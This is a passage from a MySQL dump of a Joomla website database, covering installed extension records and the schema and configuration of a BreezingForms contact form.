":\"2\",\"portal_mode_jomsocial_photos_total\":\"8\",\"portal_mode_jomsocial_photos_amount\":\"4\",\"portal_mode_jomsocial_photos_width\":\"310\",\"portal_mode_jomsocial_photos_animation\":\"0\",\"portal_mode_grid_news_cols\":\"2\",\"portal_mode_grid_news_rows\":\"2\",\"portal_mode_grid_news_title_length\":\"40\",\"portal_mode_grid_news_title_length_type\":\"chars\",\"portal_mode_grid_news_date_format\":\"f J, Y\",\"portal_mode_grid_news_text_length\":\"40\",\"portal_mode_grid_news_text_length_type\":\"chars\",\"portal_mode_grid_news_url\":\"\",\"portal_mode_grid_news_link_text\":\"Find more news\",\"portal_mode_portfolio_grid_amount\":\"20\",\"portal_mode_portfolio_grid_cols\":\"5\",\"portal_mode_portfolio_grid_cols_small_desktop\":\"4\",\"portal_mode_portfolio_grid_cols_tablet\":\"3\",\"portal_mode_portfolio_grid_cols_small_tablet\":\"2\",\"portal_mode_portfolio_grid_cols_mobile\":\"1\",\"portal_mode_portfolio_grid_title_length\":\"40\",\"portal_mode_portfolio_grid_title_length_type\":\"chars\",\"portal_mode_portfolio_grid_title_link\":\"1\",\"portal_mode_portfolio_grid_overlay\":\"1\",\"portal_mode_portfolio_grid_popup\":\"1\",\"portal_mode_portfolio_grid_date_format\":\"f J, Y\",\"portal_mode_portfolio_grid_author\":\"1\",\"portal_mode_news_slider_amount\":\"5\",\"portal_mode_news_slider_title\":\"1\",\"portal_mode_news_slider_text\":\"1\",\"portal_mode_news_slider_date\":\"1\",\"portal_mode_news_slider_date_format\":\"j F\",\"portal_mode_news_slider_autoanimation_time\":\"3000\",\"portal_mode_news_slider_image_margin\":\"-30% 0\",\"portal_mode_news_slider_label\":\"\",\"portal_mode_news_slider_category_label\":\"\",\"portal_mode_bikestore_slider_amount\":\"8\",\"portal_mode_bikestore_slider_speed\":\"3500\",\"portal_mode_bikestore_slider_autoanim\":\"0\",\"news_full_pages\":\"3\",\"news_column\":\"1\",\"news_rows\":\"1\",\"top_interface_style\":\"arrows_with_pagination\",\"open_links_window\":\"_self\",\"news_content_header_pos\":\"left\",\"news_content_header_float\":\"none\",\"news_header_link\":\"1\",\"news_header_first_word\":\"0\",\"use_title_alias\":\"0\",\"title_limit_type\":\"chars\",\"title_limit\":\"40\",\"news_content_image_pos\":\"left\",\"news_content_image_float\":\"left\",\"news_image_link\":\"1\",\"news_image_modal\":\"0\",\"news_content_text_pos\":\"left\",\"news_content_text_float\":\"left\",\"news_text_link\":\"0\",\"news_limit_type\":\"words\",\"news_limit\":\"30\",\"clean_xhtml\":\"1\",\"allowed_tags\":\"\",\"more_text_value\":\"...\",\"readmore_text\":\"\",\"parse_plugins\":\"0\",\"clean_plugins\":\"0\",\"news_content_info_pos\":\"left\",\"news_content_info_float\":\"none\",\"news_content_info2_pos\":\"left\",\"news_content_info2_float\":\"left\",\"info_format\":\"%DATE %HITS %CATEGORY %AUTHOR\",\"info2_format\":\"\",\"category_link\":\"1\",\"date_format\":\"d-m-Y\",\"date_publish\":\"0\",\"username\":\"0\",\"user_avatar\":\"1\",\"avatar_size\":\"16\",\"art_padding\":\"0 20px 20px 0\",\"news_header_order\":\"1\",\"news_header_enabled\":\"1\",\"news_image_order\":\"3\",\"news_image_enabled\":\"1\",\"news_text_order\":\"4\",\"news_text_enabled\":\"1\",\"news_info_order\":\"2\",\"news_info_enabled\":\"1\",\"news_info2_order\":\"5\",\"news_info2_enabled\":\"1\",\"news_content_readmore_pos\":\"right\",\"news_readmore_enabled\":\"1\",\"news_short_pages\":\"3\",\"links_amount\":\"3\",\"links_columns_amount\":\"1\",\"links_image\":\"0\",\"links_readmore\":\"0\",\"bottom_interface_style\":\"arrows_with_pagination\",\"links_margin\":\"0\",\"links_position\":\"bottom\",\"links_width\":\"50\",\"list_title_limit_type\":\"words\",\"list_title_limit\":\"20\",\"list_text_limit_type\":\"words\",\"list_text_limit\":\"30\",\"links_title\":\"0\",\"links_title_url\":\"\",\"links_title_label\":\"\",\"responsive_images\":\"0\",\"wrap_content\":\"0\",\"memory_limit\":\"128M\",\"use_curl_download\":\"0\",\"create_thumbs\":\"0\",\"img_auto_scale\":\"1\",\"img_keep_aspect_ratio\":\"0\",\"img_width\":\"160\",\"img_height\":\"120\",\"img_margin\":\"6px 14px 0 0\",\"links_img_width\":\"160\",\"links_img_height\":\"120\",\"links_img_margin\":\"6px 14px 0 0\",\"img_bg\":\"#000\",\"img_stretch\":\"0\",\"img_quality\":\"95\",\"thumbs_cache_time\":\"30\",\"simple_crop_editor\":\"\",\"simple_crop_top\":\"0\",\"simple_crop_bottom\":\"0\",\"simple_crop_left\":\"0\",\"simple_crop_right\":\"0\",\"crop_rules\":\"\",\"grayscale_filter\":\"0\",\"sepia_filter\":\"0\",\"blur_filter\":\"0\",\"brightness_filter\":\"0\",\"smooth_filter\":\"0\",\"pixelate_filter\":\"0\",\"contrast_filter\":\"0\",\"filter_arg\":\"0\",\"autoanim\":\"0\",\"hover_anim\":\"0\",\"animation_speed\":\"400\",\"animation_interval\":\"5000\",\"animation_function\":\"Fx.Transitions.Expo.easeIn\",\"useCSS\":\"1\",\"useScript\":\"2\",\"engine_mode\":\"jquery\",\"include_jquery\":\"0\",\"url_overrides\":\"0\"}','','',0,'0000-00-00 00:00:00',0,0),(10039,'com_djimageslider','component','com_djimageslider','',1,1,0,0,'{\"name\":\"com_djimageslider\",\"type\":\"component\",\"creationDate\":\"August 2012\",\"author\":\"DJ-Extensions.com\",\"copyright\":\"Copyright (C) 2012 DJ-Extensions.com, All rights reserved.\",\"authorEmail\":\"contact@dj-extensions.com\",\"authorUrl\":\"http:\\/\\/dj-extensions.com\",\"version\":\"3.1.0\",\"description\":\"DJ-ImageSlider component\",\"group\":\"\"}','{}','','',0,'0000-00-00 00:00:00',0,0),(10040,'DJ-ImageSlider','module','mod_djimageslider','',0,1,0,0,'{\"name\":\"DJ-ImageSlider\",\"type\":\"module\",\"creationDate\":\"May 2015\",\"author\":\"DJ-Extensions.com\",\"copyright\":\"Copyright (C) 2013 DJ-Extensions.com, All rights reserved.\",\"authorEmail\":\"contact@dj-extensions.com\",\"authorUrl\":\"http:\\/\\/dj-extensions.com\",\"version\":\"3.1.0\",\"description\":\"DJ-ImageSlider Module\",\"group\":\"\",\"filename\":\"mod_djimageslider\"}','{\"slider_source\":\"0\",\"slider_type\":\"0\",\"theme\":\"default\",\"link_image\":\"1\",\"image_folder\":\"images\\/sampledata\\/fruitshop\",\"link\":\"\",\"show_title\":\"1\",\"show_desc\":\"1\",\"show_readmore\":\"0\",\"readmore_text\":\"\",\"link_title\":\"1\",\"link_desc\":\"0\",\"limit_desc\":\"\",\"full_width\":\"0\",\"image_width\":\"240\",\"image_height\":\"180\",\"fit_to\":\"0\",\"image_centering\":\"0\",\"visible_images\":\"3\",\"space_between_images\":\"10\",\"max_images\":\"20\",\"sort_by\":\"1\",\"css3\":\"1\",\"autoplay\":\"1\",\"show_buttons\":\"1\",\"show_arrows\":\"1\",\"show_custom_nav\":\"0\",\"desc_width\":\"\",\"desc_bottom\":\"0\",\"desc_horizontal\":\"0\",\"left_arrow\":\"\",\"right_arrow\":\"\",\"play_button\":\"\",\"pause_button\":\"\",\"arrows_top\":\"40\",\"arrows_horizontal\":\"10\",\"idx_style\":\"0\",\"effect\":\"Expo\",\"effect_type\":\"0\",\"duration\":\"\",\"delay\":\"\",\"preload\":\"800\",\"cache\":\"1\",\"cache_time\":\"900\"}','','',0,'0000-00-00 00:00:00',0,0),(10041,'DJ-ImageSlider Package','package','pkg_dj-imageslider','',0,1,1,0,'{\"name\":\"DJ-ImageSlider Package\",\"type\":\"package\",\"creationDate\":\"August 2012\",\"author\":\"DJ-Extensions.com\",\"copyright\":\"Copyright (C) 2012 DJ-Extensions.com, All rights reserved.\",\"authorEmail\":\"contact@dj-extensions.com\",\"authorUrl\":\"http:\\/\\/dj-extensions.com\",\"version\":\"3.1.0\",\"description\":\"\\n\\t\\t<style type=\\\"text\\/css\\\">\\n\\t\\t\\t.djex-info { padding: 20px 30px 10px; margin: 0 0 20px 0; background: #ac00d4; color: #fff; border: 1px solid #81009f; font-family: Arial, Helvetica, sans-serif; font-size: 13px; font-weight: normal; -webkit-border-radius: 4px; border-radius: 4px; }\\n\\t\\t\\t.djex-title { text-transform: uppercase; font-weight: bold; font-size: 14px; }\\n\\t\\t\\t.djex-info a:link, .djex-info a:visited, .djex-info a:hover { color:#fff; text-decoration:underline; font-weight: 600; }\\t\\n\\t\\t\\t.djex-info img { float: left; margin: 0 30px 10px 0; }\\n\\t\\t<\\/style>\\n\\t\\t<div class=\\\"djex-info\\\">\\n\\t\\t\\t<a href=\\\"index.php?option=com_djimageslider\\\"><img src=\\\"components\\/com_djimageslider\\/assets\\/ex_slider.png\\\" \\/><\\/a>\\n\\t\\t\\t<p class=\\\"djex-title\\\">Thank you for installing DJ-ImageSlider!<\\/p>\\n\\t\\t\\t<p>The DJ-ImageSlider extension allows you to display slideshows containing slides with title and short description linked to any menu item, article or custom url address. \\n\\t\\t\\tIf you want to learn how to use DJ-ImageSlider please read <a target=\\\"_blank\\\" href=\\\"http:\\/\\/dj-extensions.com\\/documentation\\\">Documentation<\\/a> and <a target=\\\"_blank\\\" href=\\\"http:\\/\\/dj-extensions.com\\/faq\\\">FAQ section<\\/a><\\/p>\\n\\t\\t\\t<p>Check out our other extensions at <a target=\\\"_blank\\\" href=\\\"http:\\/\\/dj-extensions.com\\\">DJ-Extensions.com<\\/a><\\/p>\\n\\t\\t\\t<div style=\\\"clear:both\\\"><\\/div>\\n\\t\\t<\\/div>\\n\\t\\t\",\"group\":\"\",\"filename\":\"pkg_dj-imageslider\"}','{}','','',0,'0000-00-00 00:00:00',0,0),(10047,'SP Page Builder','component','com_sppagebuilder','',1,1,0,0,'{\"name\":\"SP Page Builder\",\"type\":\"component\",\"creationDate\":\"Sep 2014\",\"author\":\"JoomShaper\",\"copyright\":\"Copyright @ 2010 - 2015 JoomShaper. All rights reserved.\",\"authorEmail\":\"support@joomshaper.com\",\"authorUrl\":\"http:\\/\\/www.joomshaper.com\",\"version\":\"1.0.4\",\"description\":\"Most powerful drag and drop page builder for Joomla 3.3 or later.\",\"group\":\"\",\"filename\":\"sppagebuilder\"}','{}','','',0,'0000-00-00 00:00:00',0,0),(10048,'mod_sppagebuilder_icons','module','mod_sppagebuilder_icons','',1,1,2,0,'{\"name\":\"mod_sppagebuilder_icons\",\"type\":\"module\",\"creationDate\":\"August 2014\",\"author\":\"JoomShaper\",\"copyright\":\"Copyright (C) 2010 - 2015 JoomShaper. All rights reserved.\",\"authorEmail\":\"support@joomshaper.com\",\"authorUrl\":\"www.joomshaper.com\",\"version\":\"1.0.2\",\"description\":\"MOD_SPPAGEBUILDER_ICONS_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"mod_sppagebuilder_icons\"}','[]','','',0,'0000-00-00 00:00:00',0,0),(10049,'mod_sppagebuilder_admin_menu','module','mod_sppagebuilder_admin_menu','',1,1,2,0,'{\"name\":\"mod_sppagebuilder_admin_menu\",\"type\":\"module\",\"creationDate\":\"August 2014\",\"author\":\"JoomShaper\",\"copyright\":\"Copyright (C) 2010 - 2015 JoomShaper. All rights reserved.\",\"authorEmail\":\"support@joomshaper.com\",\"authorUrl\":\"www.joomshaper.com\",\"version\":\"1.0.2\",\"description\":\"MOD_SPPAGEBUILDER_MENU_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"mod_sppagebuilder_admin_menu\"}','[]','','',0,'0000-00-00 00:00:00',0,0),(10050,'plg_search_sppagebuilder','plugin','sppagebuilder','search',0,1,1,0,'{\"name\":\"plg_search_sppagebuilder\",\"type\":\"plugin\",\"creationDate\":\"July 2015\",\"author\":\"joomshaper.com\",\"copyright\":\"Copyright (C) 2015 Open Source Matters. All rights reserved.\",\"authorEmail\":\"support@joomshaper.com\",\"authorUrl\":\"www.joomshaper.com\",\"version\":\"1.0.0\",\"description\":\"PLG_SEARCH_SPPAGEBUILDER_DESCRIPTION\",\"group\":\"\",\"filename\":\"sppagebuilder\"}','{}','','',0,'0000-00-00 00:00:00',0,0),(10051,'System - SP Page Builder Pro Updater','plugin','sppagebuilderproupdater','system',0,1,1,0,'{\"name\":\"System - SP Page Builder Pro Updater\",\"type\":\"plugin\",\"creationDate\":\"Jul 2015\",\"author\":\"JoomShaper.com\",\"copyright\":\"Copyright (C) 2010 - 2015 JoomShaper. All rights reserved.\",\"authorEmail\":\"support@joomshaper.com\",\"authorUrl\":\"www.joomshaper.com\",\"version\":\"1.0\",\"description\":\"SP Page Builder Pro Updater Plugin\",\"group\":\"\",\"filename\":\"sppagebuilderproupdater\"}','{}','','',0,'0000-00-00 00:00:00',0,0),(10053,'F0F (NEW) DO NOT REMOVE','library','lib_f0f','',0,1,1,0,'{\"name\":\"F0F (NEW) DO NOT REMOVE\",\"type\":\"library\",\"creationDate\":\"2016-02-19\",\"author\":\"Nicholas K. Dionysopoulos \\/ Akeeba Ltd\",\"copyright\":\"(C)2011-2014 Nicholas K. Dionysopoulos\",\"authorEmail\":\"nicholas@akeebabackup.com\",\"authorUrl\":\"https:\\/\\/www.akeebabackup.com\",\"version\":\"2.5.3\",\"description\":\"Framework-on-Framework (FOF) newer version - DO NOT REMOVE - The rapid component development framework for Joomla!. This package is the newer version of FOF, not the one shipped with Joomla! as the official Joomla! RAD Layer. The Joomla! RAD Layer has ceased development in March 2014. DO NOT UNINSTALL THIS PACKAGE, IT IS *** N O T *** A DUPLICATE OF THE \'FOF\' PACKAGE. REMOVING EITHER FOF PACKAGE WILL BREAK YOUR SITE.\",\"group\":\"\",\"filename\":\"lib_f0f\"}','{}','','',0,'0000-00-00 00:00:00',0,0),(10054,'BreezingForms','component','com_breezingforms','',1,1,0,0,'{\"name\":\"BreezingForms\",\"type\":\"component\",\"creationDate\":\"2015-06-04\",\"author\":\"Markus Bopp | Until FacileForms Version 1.4.7: Peter Koch\",\"copyright\":\"This Joomla! component is released under the GNU\\/GPL license\",\"authorEmail\":\"markus.bopp@crosstec.org\",\"authorUrl\":\"crosstec.org\",\"version\":\"1.8.5 Stable (870)\",\"description\":\"Installation successful. Next find BreezingForms in the Components menu, and continue with step 2 of the installation process.\",\"group\":\"\",\"filename\":\"breezingforms\"}','{}','','',0,'0000-00-00 00:00:00',0,0),(10055,'BreezingForms','module','mod_breezingforms','',0,1,0,0,'{\"name\":\"BreezingForms\",\"type\":\"module\",\"creationDate\":\"November 2013\",\"author\":\"Markus Bopp - Crosstec Solutions | Until Version 1.4.7: Peter Koch\",\"copyright\":\"This Joomla! component is released under the GNU\\/GPL license\",\"authorEmail\":\"markus.bopp@crosstec.de\",\"authorUrl\":\"www.crosstec.de\",\"version\":\"1.8.4\",\"description\":\"\\n\\t\\tEnter the form name for displaying in the desired module position.\\n \",\"group\":\"\",\"filename\":\"mod_breezingforms\"}','{\"ff_mod_name\":\"\",\"ff_mod_page\":\"1\",\"ff_mod_editable\":\"0\",\"ff_mod_editable_override\":\"0\",\"ff_mod_frame\":\"0\",\"ff_mod_border\":\"0\",\"ff_mod_align\":\"1\",\"ff_mod_left\":\"0\",\"ff_mod_top\":\"0\",\"ff_mod_parprv\":\"\",\"ff_mod_parpub\":\"\",\"moduleclass_sfx\":\"\",\"owncache\":\"0\"}','','',0,'0000-00-00 00:00:00',0,0);
/*!40000 ALTER TABLE `atlyh_extensions` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `atlyh_facileforms_compmenus`
--
DROP TABLE IF EXISTS `atlyh_facileforms_compmenus`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `atlyh_facileforms_compmenus` (
`id` int(11) NOT NULL AUTO_INCREMENT,
`package` varchar(30) NOT NULL DEFAULT '',
`parent` int(11) NOT NULL DEFAULT 0,
`ordering` int(11) NOT NULL DEFAULT 0,
`published` tinyint(1) NOT NULL DEFAULT 0,
`img` varchar(255) NOT NULL DEFAULT '',
`title` varchar(255) NOT NULL DEFAULT '',
`name` varchar(255) NOT NULL DEFAULT '',
`page` int(11) NOT NULL DEFAULT 1,
`frame` tinyint(1) NOT NULL DEFAULT 0,
`border` tinyint(1) NOT NULL DEFAULT 0,
`params` text DEFAULT NULL,
PRIMARY KEY (`id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `atlyh_facileforms_compmenus`
--
LOCK TABLES `atlyh_facileforms_compmenus` WRITE;
/*!40000 ALTER TABLE `atlyh_facileforms_compmenus` DISABLE KEYS */;
/*!40000 ALTER TABLE `atlyh_facileforms_compmenus` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `atlyh_facileforms_config`
--
DROP TABLE IF EXISTS `atlyh_facileforms_config`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `atlyh_facileforms_config` (
`id` varchar(30) NOT NULL DEFAULT '',
`value` text DEFAULT NULL,
PRIMARY KEY (`id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `atlyh_facileforms_config`
--
LOCK TABLES `atlyh_facileforms_config` WRITE;
/*!40000 ALTER TABLE `atlyh_facileforms_config` DISABLE KEYS */;
INSERT INTO `atlyh_facileforms_config` VALUES ('archived','0'),('arealarge','20'),('areamedium','12'),('areasmall','4'),('cellnewline','1'),('compress','1'),('csvdelimiter',';'),('csvquote','\"'),('emailadr','Enter your email address here'),('enable_classic','0'),('exported','0'),('formname',''),('formpkg','QuickModeForms'),('getprovider','0'),('gridcolor1','#e0e0ff'),('gridcolor2','#ffe0e0'),('gridshow','1'),('gridsize','10'),('images','{mossite}/components/com_breezingforms/images'),('limitdesc','100'),('livesite','0'),('menupkg',''),('movepixels','10'),('piecepkg',''),('scriptpkg',''),('stylesheet','1'),('uploads','{mospath}/media/breezingforms/uploads'),('viewed','0'),('wysiwyg','0');
/*!40000 ALTER TABLE `atlyh_facileforms_config` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `atlyh_facileforms_elements`
--
DROP TABLE IF EXISTS `atlyh_facileforms_elements`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `atlyh_facileforms_elements` (
`id` int(11) NOT NULL AUTO_INCREMENT,
`form` int(11) NOT NULL DEFAULT 0,
`page` int(11) NOT NULL DEFAULT 1,
`ordering` int(11) NOT NULL DEFAULT 0,
`published` tinyint(1) NOT NULL DEFAULT 0,
`name` varchar(255) NOT NULL DEFAULT '',
`title` varchar(255) NOT NULL DEFAULT '',
`type` varchar(50) NOT NULL DEFAULT '',
`class1` varchar(30) DEFAULT NULL,
`class2` varchar(30) DEFAULT NULL,
`logging` tinyint(1) NOT NULL DEFAULT 1,
`posx` int(11) DEFAULT NULL,
`posxmode` tinyint(1) NOT NULL DEFAULT 0,
`posy` int(11) DEFAULT NULL,
`posymode` tinyint(1) NOT NULL DEFAULT 0,
`width` int(11) DEFAULT NULL,
`widthmode` tinyint(1) NOT NULL DEFAULT 0,
`height` int(11) DEFAULT NULL,
`heightmode` tinyint(1) NOT NULL DEFAULT 0,
`flag1` tinyint(1) NOT NULL DEFAULT 0,
`flag2` tinyint(1) NOT NULL DEFAULT 0,
`data1` text DEFAULT NULL,
`data2` text DEFAULT NULL,
`data3` text DEFAULT NULL,
`script1cond` tinyint(1) NOT NULL DEFAULT 0,
`script1id` int(11) DEFAULT NULL,
`script1code` text DEFAULT NULL,
`script1flag1` tinyint(1) NOT NULL DEFAULT 0,
`script1flag2` tinyint(1) NOT NULL DEFAULT 0,
`script2cond` tinyint(1) NOT NULL DEFAULT 0,
`script2id` int(11) DEFAULT NULL,
`script2code` text DEFAULT NULL,
`script2flag1` tinyint(1) NOT NULL DEFAULT 0,
`script2flag2` tinyint(1) NOT NULL DEFAULT 0,
`script2flag3` tinyint(1) NOT NULL DEFAULT 0,
`script2flag4` tinyint(1) NOT NULL DEFAULT 0,
`script2flag5` tinyint(1) NOT NULL DEFAULT 0,
`script3cond` tinyint(1) NOT NULL DEFAULT 0,
`script3id` int(11) DEFAULT NULL,
`script3code` text DEFAULT NULL,
`script3msg` text DEFAULT NULL,
`mailback` tinyint(1) NOT NULL DEFAULT 0,
`mailbackfile` text NOT NULL,
PRIMARY KEY (`id`)
) ENGINE=InnoDB AUTO_INCREMENT=34 DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `atlyh_facileforms_elements`
--
LOCK TABLES `atlyh_facileforms_elements` WRITE;
/*!40000 ALTER TABLE `atlyh_facileforms_elements` DISABLE KEYS */;
INSERT INTO `atlyh_facileforms_elements` VALUES (1,1,1,1,1,'NAME','Name','Text','','',1,0,0,0,0,20,0,20,0,0,0,'','','',0,8,'',0,0,0,16,'',0,0,0,0,0,0,1,'','',0,''),(2,1,1,4,1,'COMPANY','Company','Text','','',1,0,0,120,0,20,0,20,0,0,0,'','','',0,8,'',0,0,0,16,'',0,0,0,0,0,0,1,'','',0,''),(3,1,1,3,1,'CONTACT','Tel / Cel','Text','','',1,0,0,80,0,20,0,20,0,0,0,'','','',0,8,'',0,0,0,16,'',0,0,0,0,0,0,1,'','',0,''),(4,1,1,5,1,'MESSAGE','Message','Textarea','','',1,0,0,160,0,20,0,20,0,0,0,'','','',0,8,'',0,0,0,16,'',0,0,0,0,0,0,1,'','',0,''),(5,1,1,2,1,'EMAIL','Email','Text','','',1,0,0,40,0,20,0,20,0,0,0,'','','',0,8,'',0,0,0,16,'',0,0,0,0,0,1,42,'','Your email address does not appear to be valid. Please correct it before continuing.',0,''),(30,1,1,0,1,'bfFakeName','bfFakeTitle','','','',0,0,0,200,0,20,0,20,0,0,0,'','','',0,0,'',0,0,1,41,'',0,0,0,0,0,0,0,'','',0,''),(31,1,1,0,1,'bfFakeName2','bfFakeTitle2','','','',0,0,0,240,0,20,0,20,0,0,0,'','','',0,0,'',0,0,1,23,'',0,0,0,0,0,0,0,'','',0,''),(32,1,1,0,1,'bfFakeName3','bfFakeTitle3','','','',0,0,0,280,0,20,0,20,0,0,0,'','','',0,0,'',0,0,1,40,'',0,0,0,0,0,0,0,'','',0,''),(33,1,1,0,1,'bfFakeName4','bfFakeTitle4','','','',0,0,0,320,0,20,0,20,0,0,0,'','','',0,0,'',0,0,1,38,'',0,0,0,0,0,0,0,'','',0,'');
/*!40000 ALTER TABLE `atlyh_facileforms_elements` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `atlyh_facileforms_forms`
--
DROP TABLE IF EXISTS `atlyh_facileforms_forms`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `atlyh_facileforms_forms` (
`id` int(11) NOT NULL AUTO_INCREMENT,
`alt_mailfrom` text DEFAULT NULL,
`alt_fromname` text DEFAULT NULL,
`mb_alt_mailfrom` text DEFAULT NULL,
`mb_alt_fromname` text DEFAULT NULL,
`mailchimp_email_field` varchar(255) NOT NULL DEFAULT '',
`mailchimp_checkbox_field` varchar(255) NOT NULL DEFAULT '',
`mailchimp_api_key` varchar(255) NOT NULL DEFAULT '',
`mailchimp_list_id` varchar(255) NOT NULL DEFAULT '',
`mailchimp_double_optin` tinyint(1) NOT NULL DEFAULT 1,
`mailchimp_mergevars` text DEFAULT NULL,
`mailchimp_text_html_mobile_field` varchar(255) NOT NULL DEFAULT '',
`mailchimp_send_errors` tinyint(1) NOT NULL DEFAULT 0,
`mailchimp_update_existing` tinyint(1) NOT NULL DEFAULT 0,
`mailchimp_replace_interests` tinyint(1) NOT NULL DEFAULT 0,
`mailchimp_send_welcome` tinyint(1) NOT NULL DEFAULT 0,
`mailchimp_default_type` varchar(255) NOT NULL DEFAULT 'text',
`mailchimp_delete_member` tinyint(1) NOT NULL DEFAULT 0,
`mailchimp_send_goodbye` tinyint(1) NOT NULL DEFAULT 1,
`mailchimp_send_notify` tinyint(1) NOT NULL DEFAULT 1,
`mailchimp_unsubscribe_field` varchar(255) NOT NULL DEFAULT '',
`salesforce_token` varchar(255) NOT NULL DEFAULT '',
`salesforce_username` varchar(255) NOT NULL DEFAULT '',
`salesforce_password` varchar(255) NOT NULL DEFAULT '',
`salesforce_type` varchar(255) NOT NULL DEFAULT '',
`salesforce_fields` text DEFAULT NULL,
`salesforce_enabled` tinyint(1) NOT NULL DEFAULT 0,
`dropbox_email` varchar(255) NOT NULL DEFAULT '',
`dropbox_password` varchar(255) NOT NULL DEFAULT '',
`dropbox_folder` text DEFAULT NULL,
`dropbox_submission_enabled` tinyint(1) NOT NULL DEFAULT 0,
`dropbox_submission_types` varchar(255) NOT NULL DEFAULT 'pdf',
`tags_content` text NOT NULL,
`tags_content_template` mediumtext NOT NULL,
`tags_content_template_default_element` int(11) NOT NULL DEFAULT 0,
`tags_form` text NOT NULL,
`tags_content_default_category` int(11) NOT NULL DEFAULT 0,
`tags_content_default_state` int(11) NOT NULL DEFAULT 1,
`tags_content_default_access` int(11) NOT NULL DEFAULT 1,
`tags_content_default_language` varchar(7) NOT NULL DEFAULT '*',
`tags_content_default_featured` int(11) NOT NULL DEFAULT 0,
`tags_content_default_publishup` varchar(255) NOT NULL DEFAULT '0000-00-00 00:00:00',
`tags_content_default_publishdown` varchar(255) NOT NULL DEFAULT '0000-00-00 00:00:00',
`autoheight` tinyint(1) NOT NULL DEFAULT 0,
`package` varchar(30) NOT NULL DEFAULT '',
`template_code` longtext NOT NULL,
`template_code_processed` longtext NOT NULL,
`template_areas` longtext NOT NULL,
`ordering` int(11) NOT NULL DEFAULT 0,
`published` tinyint(1) NOT NULL DEFAULT 0,
`runmode` tinyint(1) NOT NULL DEFAULT 0,
`name` varchar(255) NOT NULL DEFAULT '',
`custom_mail_subject` varchar(255) NOT NULL DEFAULT '',
`mb_custom_mail_subject` varchar(255) NOT NULL DEFAULT '',
`title` varchar(255) NOT NULL DEFAULT '',
`description` text DEFAULT NULL,
`class1` varchar(30) DEFAULT NULL,
`class2` varchar(30) DEFAULT NULL,
`width` int(11) NOT NULL DEFAULT 0,
`widthmode` tinyint(1) NOT NULL DEFAULT 0,
`height` int(11) NOT NULL DEFAULT 0,
`heightmode` tinyint(1) NOT NULL DEFAULT 0,
`pages` int(11) NOT NULL DEFAULT 1,
`emailntf` tinyint(1) NOT NULL DEFAULT 1,
`mb_emailntf` tinyint(1) NOT NULL DEFAULT 1,
`emaillog` tinyint(1) NOT NULL DEFAULT 1,
`mb_emaillog` tinyint(1) NOT NULL DEFAULT 1,
`emailxml` tinyint(1) NOT NULL DEFAULT 0,
`mb_emailxml` tinyint(1) NOT NULL DEFAULT 0,
`email_type` tinyint(1) NOT NULL DEFAULT 0,
`mb_email_type` tinyint(1) NOT NULL DEFAULT 0,
`email_custom_template` text DEFAULT NULL,
`mb_email_custom_template` text DEFAULT NULL,
`email_custom_html` tinyint(1) NOT NULL DEFAULT 0,
`mb_email_custom_html` tinyint(1) NOT NULL DEFAULT 0,
`emailadr` text DEFAULT NULL,
`dblog` tinyint(1) NOT NULL DEFAULT 1,
`script1cond` tinyint(1) NOT NULL DEFAULT 0,
`script1id` int(11) DEFAULT NULL,
`script1code` text DEFAULT NULL,
`script2cond` tinyint(1) NOT NULL DEFAULT 0,
`script2id` int(11) DEFAULT NULL,
`script2code` text DEFAULT NULL,
`piece1cond` tinyint(1) NOT NULL DEFAULT 0,
`piece1id` int(11) DEFAULT NULL,
`piece1code` text DEFAULT NULL,
`piece2cond` tinyint(1) NOT NULL DEFAULT 0,
`piece2id` int(11) DEFAULT NULL,
`piece2code` text DEFAULT NULL,
`piece3cond` tinyint(1) NOT NULL DEFAULT 0,
`piece3id` int(11) DEFAULT NULL,
`piece3code` text DEFAULT NULL,
`piece4cond` tinyint(1) NOT NULL DEFAULT 0,
`piece4id` int(11) DEFAULT NULL,
`piece4code` text DEFAULT NULL,
`prevmode` tinyint(1) NOT NULL DEFAULT 2,
`prevwidth` int(11) DEFAULT NULL,
`filter_state` text NOT NULL,
PRIMARY KEY (`id`)
) ENGINE=InnoDB AUTO_INCREMENT=2 DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `atlyh_facileforms_forms`
--
LOCK TABLES `atlyh_facileforms_forms` WRITE;
/*!40000 ALTER TABLE `atlyh_facileforms_forms` DISABLE KEYS */;
